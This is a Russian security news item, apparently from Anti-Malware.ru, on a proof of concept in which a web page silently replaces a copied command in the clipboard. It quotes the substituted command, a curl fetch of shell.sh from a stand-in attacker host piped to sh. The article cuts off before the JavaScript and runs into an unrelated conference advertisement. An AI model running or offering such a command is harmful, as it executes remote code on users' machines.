Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Эксперт показал подмену скопированной на веб-странице команды

Ряд программистов, системных администраторов и исследователей привыкли копировать определённые куски кода на веб-страницах, а затем вставлять их, например, в консоль или терминал. Как оказалось, это пагубная практика, которая может привести к негативным для устройства последствиям.

Габриэль Фридлендер, основатель платформы для обучения основам кибербезопасности — Wizer, показал очевидный, но при этом интересный приём, который заставит по-новому взглянуть на процесс копирования-вставки с веб-страниц.

Суть в том, что при копировании страница может незаметно подменить содержимое буфера обмена, что приведёт к использованию совершенно другой команды на устройстве пользователя. Поскольку как новички, так и уже опытные сисадмины привыкли иногда «копипастить» код (характерный пример — со StackOverflow), будет полезно помнить про описанную Фридлендером технику.

Специалист даже опубликовал в блоге тривиальный демонстрационный код (proof-of-concept, PoC) и просит читателей попробовать скопировать простейшую команду, с которой знакомо подавляющее большинство системных администраторов:

 

После вставки скопированной команды в любой текстовый редактор пользователь увидит совершенно другое:

curl http://attacker-domain:8000/shell.sh | sh

Примечательно, что при вставке этой команды в терминал Linux она моментально выполнится, что создаёт ещё больший риск, ведь пользователь даже не успеет проверить корректность введённых данных.

Как пояснил Фридлендер, суть трюка кроется в JavaScript-коде, размещённом на демонстрационной странице:

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

На конференции «Гарды» обсудят будущее киберугроз и защиту данных в 2026

За первые шесть месяцев 2025 года в России зафиксировали 35 утечек персональных данных. В результате «утекло» больше 39 миллионов записей. И что важно — в 68% случаев виноват оказался человеческий фактор. Исследование hh.ru и Staffcop показало, что 38% сотрудников компаний никогда не проходили обучение по правилам информационной безопасности.

А у более чем 10% бывших сотрудников доступ к корпоративным системам сохраняется даже после увольнения. Всё это только подтверждает: защита данных давно уже не вопрос отдельных отраслей, а задача абсолютно каждой организации.

По данным центра компетенций «Гарда», в 2025 году киберпреступники по-прежнему активно используют социальную инженерию, фишинг и атаки на цепочки поставок. Всё чаще они подключают искусственный интеллект — и для проверки кода при создании зловредов, и для автоматизации атак. К тому же растёт число DDoS-атак, и в 2024 году до 40% из них имели идеологический подтекст.

«Ежегодно конференция “Гарда: Сохранить все. Безопасность информации” становится площадкой для открытого диалога между стейкхолдерами по вопросам защиты данных, ‒ говорит бизнес-партнер по инновационному развитию в Департаменте продуктового развития группы компаний «Гарда» Лука Сафонов. ‒ Эксперты рынка ИТ- и ИБ-, регуляторы, которые сегодня определяют стратегическое развитие отрасли, разрабатывают действенные решения для сложных задач защиты данных, ведь их потеря влечет не только убытки, но и снижение доверия со стороны клиентов и партнеров».

В программе конференции — пленарное заседание с участием министра цифрового развития и руководителей крупнейших компаний, прогнозы по киберугрозам на 2026 год, презентация новых технологий для защиты данных и «открытый микрофон» с представителями Минцифры, СМИ и отраслевых объединений.

Конференция пройдёт 16 октября в конгресс-центре Soluxe (Москва, ул. Вильгельма Пика, 16).
Участие бесплатное, но нужна предварительная регистрация.

[Регистрация на мероприятие!]

AM LiveПодписывайтесь на канал "AM Live" в Telegram, чтобы первыми узнавать о главных событиях и предстоящих мероприятиях по информационной безопасности.

RSS: Новости на портале Anti-Malware.ru